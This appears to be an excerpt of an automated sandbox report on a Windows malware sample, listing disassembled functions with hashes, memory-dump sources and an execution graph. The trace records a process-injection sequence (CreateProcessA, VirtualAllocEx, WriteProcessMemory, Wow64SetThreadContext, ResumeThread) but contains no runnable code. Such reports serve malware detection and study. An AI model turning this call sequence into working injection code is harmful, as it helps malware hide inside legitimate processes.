                                                              • Instruction Fuzzy Hash: 2021537AA0011AABDB20DF69DC54AEEBBF8AF54641F54011AFA45E7240E730DA11CBA1
                                                              Function 015BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016002BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016002E7
                                                              • RTL: Re-Waiting, xrefs: 0160031E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: e3a8cb5aba3fdb5cdbe9f181d5262b508eb4c63e1f7b27cb8901afda76a70c54
                                                              • Instruction ID: e71c86800a6dc1d2f3a84f317c27e0af50aec4dd5123f9951130d8db1a310815
                                                              • Opcode Fuzzy Hash: e3a8cb5aba3fdb5cdbe9f181d5262b508eb4c63e1f7b27cb8901afda76a70c54
                                                              • Instruction Fuzzy Hash: 02E19C306047429FD72ACF2CCC84B6ABBE0BB88754F144A6EF5A58B2E1D774D945CB42
                                                              Function 015CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01607B7F
                                                              • RTL: Re-Waiting, xrefs: 01607BAC
                                                              • RTL: Resource at %p, xrefs: 01607B8E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 269d3590e9dad9dd7094504a2923601b0865f35877f8fb2af09ea4b6117a0754
                                                              • Instruction ID: daba75950b8e8159b8e9784b2cc5b19c78c1d7965538d5fa5f53cc92bbbe1139
                                                              • Opcode Fuzzy Hash: 269d3590e9dad9dd7094504a2923601b0865f35877f8fb2af09ea4b6117a0754
                                                              • Instruction Fuzzy Hash: D941D0317007039FD725DE69CC41B6BB7E5FB98B10F000A1DE9AA9B780DB71E8058B91
                                                              Function 015CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0160728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 016072C1
                                                              • RTL: Resource at %p, xrefs: 016072A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01607294
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: a036ee0f9178a331028e122098e7a53bb958175802096389ccf107d21cd83027
                                                              • Instruction ID: cc1bf0877383e9aedd7ed62e53955c8c1088ce8ed99bbb17fec1d48dc4fa8b73
                                                              • Opcode Fuzzy Hash: a036ee0f9178a331028e122098e7a53bb958175802096389ccf107d21cd83027
                                                              • Instruction Fuzzy Hash: 34411231604206AFC725CE69CC82F6AB7A6FF94B10F14461CF9959B280DB31F8128BD1
                                                              Function 01642300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: fef0f8433d28696708cc1860b8757b9e73884b7814e6151eaba94fadf4a304a1
                                                              • Instruction ID: 7aff1f3a2368420c9fd9a85c4d5df41e00ea5e703a450f397541e2745708c1c3
                                                              • Opcode Fuzzy Hash: fef0f8433d28696708cc1860b8757b9e73884b7814e6151eaba94fadf4a304a1
                                                              • Instruction Fuzzy Hash: E2318072A006199FDB21DF2DDC50BEEB7F8FB44610F54059AF949E7240EB30AA548FA0
                                                              Function 015D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: bd109ff267c79021aff9273fbea2723ddd8661a325ea45c090fcd2d617567fbd
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: D791A171E002179EEB34DF6DC8816BEBBA1FF88328F54455AE965EF2C0E73099418751
                                                              Function 01599126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 1f7684f49a43a158d48254c8e437b3b19d1e317aa383caf2ecfeb6302d950003
                                                              • Instruction ID: ef814f6d351ff82fd828096481570fb976f1265b752c47719c6ffab4973dd735
                                                              • Opcode Fuzzy Hash: 1f7684f49a43a158d48254c8e437b3b19d1e317aa383caf2ecfeb6302d950003
                                                              • Instruction Fuzzy Hash: CE810CB1D0026A9BDB35CB54CC44BEEB7B4BF48714F0041DAAA19BB680D7309E84CFA1

                                                              Execution Graph

                                                              Execution Coverage:10.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:334
                                                              Total number of Limit Nodes:24
                                                              execution_graph 54511 7381fd8 54515 7382010 54511->54515 54520 7382000 54511->54520 54512 7381ff7 54516 7382019 54515->54516 54525 7382058 54516->54525 54533 738204e 54516->54533 54517 738203e 54517->54512 54521 738200e 54520->54521 54523 7382058 DrawTextExW 54521->54523 54524 738204e DrawTextExW 54521->54524 54522 738203e 54522->54512 54523->54522 54524->54522 54526 7382082 54525->54526 54527 7382093 54525->54527 54526->54517 54527->54526 54541 738246e 54527->54541 54546 738b600 54527->54546 54551 738b610 54527->54551 54557 7382380 54527->54557 54562 7382370 54527->54562 54534 7382082 54533->54534 54535 7382093 54533->54535 54534->54517 54535->54534 54536 738246e DrawTextExW 54535->54536 54537 7382370 DrawTextExW 54535->54537 54538 7382380 DrawTextExW 54535->54538 54539 738b610 DrawTextExW 54535->54539 54540 738b600 DrawTextExW 54535->54540 54536->54534 54537->54534 54538->54534 54539->54534 54540->54534 54542 738246f 54541->54542 54543 73824ae 54542->54543 54567 7382c10 54542->54567 54572 7382c00 54542->54572 54547 738b610 54546->54547 54549 738b636 54547->54549 54623 738b790 54547->54623 54548 738b68f 54548->54526 54549->54526 54552 738b66d 54551->54552 54553 738b636 54551->54553 54555 738b699 54552->54555 54556 738b790 DrawTextExW 54552->54556 54553->54526 54554 738b68f 54554->54526 54555->54526 54556->54554 54559 73823a8 54557->54559 54558 73824ae 54559->54558 54560 7382c10 DrawTextExW 54559->54560 54561 7382c00 DrawTextExW 54559->54561 54560->54558 54561->54558 54564 7382380 54562->54564 54563 73824ae 54564->54563 54565 7382c10 DrawTextExW 54564->54565 54566 7382c00 DrawTextExW 54564->54566 54565->54563 54566->54563 54568 7382c26 54567->54568 54577 7383078 54568->54577 54581 7383068 54568->54581 54569 7382c9c 54569->54543 54573 7382c10 54572->54573 54575 7383078 DrawTextExW 54573->54575 54576 7383068 DrawTextExW 54573->54576 54574 7382c9c 54574->54543 54575->54574 54576->54574 54586 73830b8 54577->54586 54591 73830a8 54577->54591 54578 7383096 54578->54569 54582 7383078 54581->54582 54584 73830b8 DrawTextExW 54582->54584 54585 73830a8 DrawTextExW 54582->54585 54583 7383096 54583->54569 54584->54583 54585->54583 54587 73830e9 54586->54587 54588 7383116 54587->54588 54596 7383138 54587->54596 54601 7383129 54587->54601 54588->54578 54592 73830e9 54591->54592 54593 7383116 54592->54593 54594 7383138 DrawTextExW 54592->54594 54595 7383129 DrawTextExW 54592->54595 54593->54578 54594->54593 54595->54593 54598 7383159 54596->54598 54597 738316e 54597->54588 54598->54597 54606 73812e8 54598->54606 54600 73831d9 54602 7383138 54601->54602 54603 738316e 54602->54603 54604 73812e8 DrawTextExW 54602->54604 54603->54588 54605 73831d9 54604->54605 54608 73812f3 54606->54608 54607 73851a9 54607->54600 54608->54607 54612 7385d20 54608->54612 54615 7385d10 54608->54615 54609 73852bc 54609->54600 54619 73847bc 54612->54619 54616 7385d20 54615->54616 54617 73847bc DrawTextExW 54616->54617 54618 7385d3d 54617->54618 54618->54609 54620 7385d58 DrawTextExW 54619->54620 54622 7385d3d 54620->54622 54622->54609 54624 738b7c4 54623->54624 54628 738bd69 54624->54628 54634 738bd70 54624->54634 54625 738b7e0 54625->54548 54629 738bd95 54628->54629 54630 738bdb9 54629->54630 54640 738f608 54629->54640 54645 738f5e0 54629->54645 54630->54625 54631 738be76 54635 738bd95 54634->54635 54636 738bdb9 54635->54636 54638 738f608 DrawTextExW 54635->54638 54639 738f5e0 DrawTextExW 54635->54639 54636->54625 54637 738be76 54638->54637 54639->54637 54641 738f620 54640->54641 54642 738f624 54641->54642 54650 738fc00 54641->54650 54654 738fbf3 54641->54654 54642->54631 54646 738f620 54645->54646 54647 738f624 54646->54647 54648 738fc00 DrawTextExW 54646->54648 54649 738fbf3 DrawTextExW 54646->54649 54647->54631 54648->54647 54649->54647 54652 738fc30 54650->54652 54651 738fd7f 54651->54642 54652->54651 54653 7383138 DrawTextExW 54652->54653 54653->54651 54656 738fc30 54654->54656 54655 738fd7f 54655->54642 54656->54655 54657 7383138 DrawTextExW 54656->54657 54657->54655 54658 738a6d8 54659 738a6ff 54658->54659 54660 738a6e5 54658->54660 54664 57555f0 54660->54664 54670 57555df 54660->54670 54661 738a6ec 54665 5755613 54664->54665 54666 5755617 54665->54666 54676 738a71f 54665->54676 54680 738a730 54665->54680 54666->54661 54667 57556b5 54671 5755613 54670->54671 54672 5755617 54671->54672 54674 738a71f DrawTextExW 54671->54674 54675 738a730 DrawTextExW 54671->54675 54672->54661 54673 57556b5 54674->54673 54675->54673 54678 738a756 54676->54678 54684 738a82e 54678->54684 54681 738a756 54680->54681 54683 738a82e DrawTextExW 54681->54683 54682 738a7e4 54682->54667 54683->54682 54685 738a846 54684->54685 54689 5755842 54685->54689 54694 5755850 54685->54694 54686 738a7e4 54686->54667 54690 575582b 54689->54690 54691 575584a 54689->54691 54690->54686 54698 5755a86 54691->54698 54695 5755862 54694->54695 54697 5755a86 DrawTextExW 54695->54697 54696 57558e2 54696->54686 54697->54696 54704 5755a00 54698->54704 54709 57559fa 54698->54709 54714 5755ab0 54698->54714 54720 5755ac0 54698->54720 54699 57558e2 54699->54686 54705 5755a13 54704->54705 54706 5755a17 54705->54706 54725 738b408 54705->54725 54730 738b406 54705->54730 54706->54699 54710 5755a00 54709->54710 54711 5755a17 54710->54711 54712 738b408 DrawTextExW 54710->54712 54713 738b406 DrawTextExW 54710->54713 54711->54699 54712->54711 54713->54711 54715 5755b12 54714->54715 54716 5755ab3 54714->54716 54715->54699 54717 5755b0f 54716->54717 54718 738b408 DrawTextExW 54716->54718 54719 738b406 DrawTextExW 54716->54719 54717->54699 54718->54717 54719->54717 54721 5755ae6 54720->54721 54722 5755b0f 54721->54722 54723 738b408 DrawTextExW 54721->54723 54724 738b406 DrawTextExW 54721->54724 54722->54699 54723->54722 54724->54722 54727 738b427 54725->54727 54726 738b5ad 54726->54706 54727->54726 54735 738b5b8 54727->54735 54739 738b5c8 54727->54739 54732 738b427 54730->54732 54731 738b5ad 54731->54706 54732->54731 54733 738b5b8 DrawTextExW 54732->54733 54734 738b5c8 DrawTextExW 54732->54734 54733->54732 54734->54732 54736 738b5c8 54735->54736 54737 7382058 DrawTextExW 54736->54737 54738 738b5f5 54737->54738 54738->54727 54740 738b5d1 54739->54740 54741 7382058 DrawTextExW 54740->54741 54742 738b5f5 54741->54742 54742->54727 54330 bfb15c8 54331 bfb1753 54330->54331 54332 bfb15ee 54330->54332 54332->54331 54335 bfb1848 PostMessageW 54332->54335 54337 bfb1841 54332->54337 54336 bfb18b4 54335->54336 54336->54332 54338 bfb1848 PostMessageW 54337->54338 54339 bfb18b4 54338->54339 54339->54332 54361 157d810 DuplicateHandle 54362 157d8a6 54361->54362 54743 157ae30 54744 157ae3f 54743->54744 54746 157af19 54743->54746 54747 157af5c 54746->54747 54748 157af39 54746->54748 54747->54744 54748->54747 54749 157b160 GetModuleHandleW 54748->54749 54750 157b18d 54749->54750 54750->54744 54363 73ae7e1 54365 73ae4a8 54363->54365 54364 73ae772 54365->54364 54369 bfb03d6 54365->54369 54384 bfb0368 54365->54384 54398 bfb0378 54365->54398 54370 bfb0364 54369->54370 54372 bfb03d9 54369->54372 54371 bfb03b6 54370->54371 54412 bfb0adb 54370->54412 54416 bfb0bf5 54370->54416 54421 bfb0947 54370->54421 54426 bfb1012 54370->54426 54430 bfb0dd2 54370->54430 54435 bfb0a32 54370->54435 54440 bfb0c3c 54370->54440 54445 bfb085f 54370->54445 54450 bfb0a8f 54370->54450 54454 bfb0ac8 54370->54454 54459 bfb0d69 54370->54459 54371->54364 54372->54364 54385 bfb0392 54384->54385 54386 bfb0adb 2 API calls 54385->54386 54387 bfb0d69 2 API calls 54385->54387 54388 bfb0ac8 2 API calls 54385->54388 54389 bfb03b6 54385->54389 54390 bfb0a8f 2 API calls 54385->54390 54391 bfb085f 2 API calls 54385->54391 54392 bfb0c3c 2 API calls 54385->54392 54393 bfb0a32 2 API calls 54385->54393 54394 bfb0dd2 2 API calls 54385->54394 54395 bfb1012 2 API calls 54385->54395 54396 bfb0947 2 API calls 54385->54396 54397 bfb0bf5 2 API calls 54385->54397 54386->54389 54387->54389 54388->54389 54389->54364 54390->54389 54391->54389 54392->54389 54393->54389 54394->54389 54395->54389 54396->54389 54397->54389 54399 bfb0392 54398->54399 54400 bfb03b6 54399->54400 54401 bfb0adb 2 API calls 54399->54401 54402 bfb0d69 2 API calls 54399->54402 54403 bfb0ac8 2 API calls 54399->54403 54404 bfb0a8f 2 API calls 54399->54404 54405 bfb085f 2 API calls 54399->54405 54406 bfb0c3c 2 API calls 54399->54406 54407 bfb0a32 2 API calls 54399->54407 54408 bfb0dd2 2 API calls 54399->54408 54409 bfb1012 2 API calls 54399->54409 54410 bfb0947 2 API calls 54399->54410 54411 bfb0bf5 2 API calls 54399->54411 54400->54364 54401->54400 54402->54400 54403->54400 54404->54400 54405->54400 54406->54400 54407->54400 54408->54400 54409->54400 54410->54400 54411->54400 54463 73adee8 54412->54463 54467 73adef0 54412->54467 54413 bfb0afd 54413->54371 54417 bfb0bfa 54416->54417 54471 73ad429 54417->54471 54475 73ad430 54417->54475 54418 bfb0c1d 54422 bfb0f27 54421->54422 54479 73ad9f8 54422->54479 54483 73ada00 54422->54483 54423 bfb0f4b 54487 73ad938 54426->54487 54491 73ad940 54426->54491 54427 bfb1030 54431 bfb0dd8 54430->54431 54433 73ad9f8 WriteProcessMemory 54431->54433 54434 73ada00 WriteProcessMemory 54431->54434 54432 bfb0df3 54433->54432 54434->54432 54436 bfb0a4d 54435->54436 54495 73ad378 54436->54495 54499 73ad380 54436->54499 54437 bfb114a 54441 bfb0c49 54440->54441 54443 73ad378 ResumeThread 54441->54443 54444 73ad380 ResumeThread 54441->54444 54442 bfb114a 54443->54442 54444->54442 54446 bfb0865 54445->54446 54503 73ae088 54446->54503 54507 73ae07c 54446->54507 54452 73ad429 Wow64SetThreadContext 54450->54452 54453 73ad430 Wow64SetThreadContext 54450->54453 54451 bfb0aa9 54451->54371 54452->54451 54453->54451 54455 bfb0a36 54454->54455 54457 73ad378 ResumeThread 54455->54457 54458 73ad380 ResumeThread 54455->54458 54456 bfb114a 54457->54456 54458->54456 54461 73ad9f8 WriteProcessMemory 54459->54461 54462 73ada00 WriteProcessMemory 54459->54462 54460 bfb0d94 54460->54371 54461->54460 54462->54460 54464 73adef0 ReadProcessMemory 54463->54464 54466 73adf7f 54464->54466 54466->54413 54468 73adf3b ReadProcessMemory 54467->54468 54470 73adf7f 54468->54470 54470->54413 54472 73ad430 Wow64SetThreadContext 54471->54472 54474 73ad4bd 54472->54474 54474->54418 54476 73ad475 Wow64SetThreadContext 54475->54476 54478 73ad4bd 54476->54478 54478->54418 54480 73ada00 WriteProcessMemory 54479->54480 54482 73ada9f 54480->54482 54482->54423 54484 73ada48 WriteProcessMemory 54483->54484 54486 73ada9f 54484->54486 54486->54423 54488 73ad940 VirtualAllocEx 54487->54488 54490 73ad9bd 54488->54490 54490->54427 54492 73ad980 VirtualAllocEx 54491->54492 54494 73ad9bd 54492->54494 54494->54427 54496 73ad380 ResumeThread 54495->54496 54498 73ad3f1 54496->54498 54498->54437 54500 73ad3c0 ResumeThread 54499->54500 54502 73ad3f1 54500->54502 54502->54437 54504 73ae111 CreateProcessA 54503->54504 54506 73ae2d3 54504->54506 54508 73ae111 CreateProcessA 54507->54508 54510 73ae2d3 54508->54510 54320 157d5c8 54321 157d60e GetCurrentProcess 54320->54321 54323 157d660 GetCurrentThread 54321->54323 54326 157d659 54321->54326 54324 157d696 54323->54324 54325 157d69d GetCurrentProcess 54323->54325 54324->54325 54329 157d6d3 54325->54329 54326->54323 54327 157d6fb GetCurrentThreadId 54328 157d72c 54327->54328 54329->54327 54340 1574668 54341 157467a 54340->54341 54342 1574686 54341->54342 54344 1574779 54341->54344 54345 157479d 54344->54345 54349 1574878 54345->54349 54353 1574888 54345->54353 54350 1574888 54349->54350 54352 157498c 54350->54352 54357 157449c 54350->54357 54354 15748af 54353->54354 54355 157498c 54354->54355 54356 157449c CreateActCtxA 54354->54356 54356->54355 54358 1575918 CreateActCtxA 54357->54358 54360 15759db 54358->54360

                                                              Executed Functions

                                                              Function 0BFB1008 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1530340710.000000000BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_bfb0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 515cd28a793fc317d72faa515dfc5cdf20a5ad28af9f05608ea508622091bfeb
                                                              • Instruction ID: 622a0eefde46cbca938c5977588bb18a94a06ee0ffa1815f0113c1d35c6d0711
                                                              • Opcode Fuzzy Hash: 515cd28a793fc317d72faa515dfc5cdf20a5ad28af9f05608ea508622091bfeb
                                                              • Instruction Fuzzy Hash: 4BA00273D6D006D6CA450F1F8021CF7F73DA65B944E207750812AB7D138726C1615D1C
                                                              Function 0157D5B9 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 342 157d5b9-157d657 GetCurrentProcess 346 157d660-157d694 GetCurrentThread 342->346 347 157d659-157d65f 342->347 348 157d696-157d69c 346->348 349 157d69d-157d6d1 GetCurrentProcess 346->349 347->346 348->349 350 157d6d3-157d6d9 349->350 351 157d6da-157d6f5 call 157d797 349->351 350->351 355 157d6fb-157d72a GetCurrentThreadId 351->355 356 157d733-157d795 355->356 357 157d72c-157d732 355->357 357->356
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0157D646
                                                              • GetCurrentThread.KERNEL32 ref: 0157D683
                                                              • GetCurrentProcess.KERNEL32 ref: 0157D6C0
                                                              • GetCurrentThreadId.KERNEL32 ref: 0157D719
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 277f018b8879f01bb2d543521674674f4b57321a318fcf94d0348e2c638acd31
                                                              • Instruction ID: 4a8d46bdf633798dd13374541ffbdea06fa289cb4bea377388c260234aeef254
                                                              • Opcode Fuzzy Hash: 277f018b8879f01bb2d543521674674f4b57321a318fcf94d0348e2c638acd31
                                                              • Instruction Fuzzy Hash: DE5188B0D013498FEB14DFAAE54979EBBF1FF48304F208459D419AB290D7346945CF25
                                                              Function 0157D5C8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 364 157d5c8-157d657 GetCurrentProcess 368 157d660-157d694 GetCurrentThread 364->368 369 157d659-157d65f 364->369 370 157d696-157d69c 368->370 371 157d69d-157d6d1 GetCurrentProcess 368->371 369->368 370->371 372 157d6d3-157d6d9 371->372 373 157d6da-157d6f5 call 157d797 371->373 372->373 377 157d6fb-157d72a GetCurrentThreadId 373->377 378 157d733-157d795 377->378 379 157d72c-157d732 377->379 379->378
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0157D646
                                                              • GetCurrentThread.KERNEL32 ref: 0157D683
                                                              • GetCurrentProcess.KERNEL32 ref: 0157D6C0
                                                              • GetCurrentThreadId.KERNEL32 ref: 0157D719
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: dc7af2536cd0902dec7013e8186fc88bb12eea892cf7f0e1e85293188ea85a68
                                                              • Instruction ID: e5c78d090ea9a2ef1dbaa2b56c0bb6fcc320efaffcb0547d35f27a6cb69d3fbb
                                                              • Opcode Fuzzy Hash: dc7af2536cd0902dec7013e8186fc88bb12eea892cf7f0e1e85293188ea85a68
                                                              • Instruction Fuzzy Hash: 105187B09013098FEB14DFAAE549B9EBBF1FF88310F208459D419AB390D7346944CF65
                                                              Function 073AE07C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 796 73ae07c-73ae11d 798 73ae11f-73ae129 796->798 799 73ae156-73ae176 796->799 798->799 800 73ae12b-73ae12d 798->800 804 73ae178-73ae182 799->804 805 73ae1af-73ae1de 799->805 802 73ae12f-73ae139 800->802 803 73ae150-73ae153 800->803 806 73ae13b 802->806 807 73ae13d-73ae14c 802->807 803->799 804->805 808 73ae184-73ae186 804->808 815 73ae1e0-73ae1ea 805->815 816 73ae217-73ae2d1 CreateProcessA 805->816 806->807 807->807 809 73ae14e 807->809 810 73ae188-73ae192 808->810 811 73ae1a9-73ae1ac 808->811 809->803 813 73ae196-73ae1a5 810->813 814 73ae194 810->814 811->805 813->813 817 73ae1a7 813->817 814->813 815->816 818 73ae1ec-73ae1ee 815->818 827 73ae2da-73ae360 816->827 828 73ae2d3-73ae2d9 816->828 817->811 820 73ae1f0-73ae1fa 818->820 821 73ae211-73ae214 818->821 822 73ae1fe-73ae20d 820->822 823 73ae1fc 820->823 821->816 822->822 824 73ae20f 822->824 823->822 824->821 838 73ae362-73ae366 827->838 839 73ae370-73ae374 827->839 828->827 838->839 840 73ae368 838->840 841 73ae376-73ae37a 839->841 842 73ae384-73ae388 839->842 840->839 841->842 843 73ae37c 841->843 844 73ae38a-73ae38e 842->844 845 73ae398-73ae39c 842->845 843->842 844->845 846 73ae390 844->846 847 73ae3ae-73ae3b5 845->847 848 73ae39e-73ae3a4 845->848 846->845 849 73ae3cc 847->849 850 73ae3b7-73ae3c6 847->850 848->847 852 73ae3cd 849->852 850->849 852->852
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073AE2BE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: db02b9488bf6082024e8fbe367890ac3c206dac843130e8372b1e333ca666f75
                                                              • Instruction ID: dcd924f4d4ca1ab939575aeb3508f54e929a9f378a9c98ddb4e0bd4e97a5fa12
                                                              • Opcode Fuzzy Hash: db02b9488bf6082024e8fbe367890ac3c206dac843130e8372b1e333ca666f75
                                                              • Instruction Fuzzy Hash: EBA14EB1D0032ADFEB24DF68C842B9DBBB2FF48310F1485A9D819A7240D7759985CF91
                                                              Function 073AE088 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 853 73ae088-73ae11d 855 73ae11f-73ae129 853->855 856 73ae156-73ae176 853->856 855->856 857 73ae12b-73ae12d 855->857 861 73ae178-73ae182 856->861 862 73ae1af-73ae1de 856->862 859 73ae12f-73ae139 857->859 860 73ae150-73ae153 857->860 863 73ae13b 859->863 864 73ae13d-73ae14c 859->864 860->856 861->862 865 73ae184-73ae186 861->865 872 73ae1e0-73ae1ea 862->872 873 73ae217-73ae2d1 CreateProcessA 862->873 863->864 864->864 866 73ae14e 864->866 867 73ae188-73ae192 865->867 868 73ae1a9-73ae1ac 865->868 866->860 870 73ae196-73ae1a5 867->870 871 73ae194 867->871 868->862 870->870 874 73ae1a7 870->874 871->870 872->873 875 73ae1ec-73ae1ee 872->875 884 73ae2da-73ae360 873->884 885 73ae2d3-73ae2d9 873->885 874->868 877 73ae1f0-73ae1fa 875->877 878 73ae211-73ae214 875->878 879 73ae1fe-73ae20d 877->879 880 73ae1fc 877->880 878->873 879->879 881 73ae20f 879->881 880->879 881->878 895 73ae362-73ae366 884->895 896 73ae370-73ae374 884->896 885->884 895->896 897 73ae368 895->897 898 73ae376-73ae37a 896->898 899 73ae384-73ae388 896->899 897->896 898->899 900 73ae37c 898->900 901 73ae38a-73ae38e 899->901 902 73ae398-73ae39c 899->902 900->899 901->902 903 73ae390 901->903 904 73ae3ae-73ae3b5 902->904 905 73ae39e-73ae3a4 902->905 903->902 906 73ae3cc 904->906 907 73ae3b7-73ae3c6 904->907 905->904 909 73ae3cd 906->909 907->906 909->909
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073AE2BE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: b21562ffb52f2a8e8bc527eac5f1263da22015304a7ad0f71c16560e5210728a
                                                              • Instruction ID: 730ce1901af384c3db94408efa91f0d8de77e2e9c13e59720fa54373795bc6fd
                                                              • Opcode Fuzzy Hash: b21562ffb52f2a8e8bc527eac5f1263da22015304a7ad0f71c16560e5210728a
                                                              • Instruction Fuzzy Hash: 13915EB1D0032ADFEB24DF69C8427ADBBB2FF48310F1485A9D819A7240DB759985CF91
                                                              Function 0157AF19 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              APIs
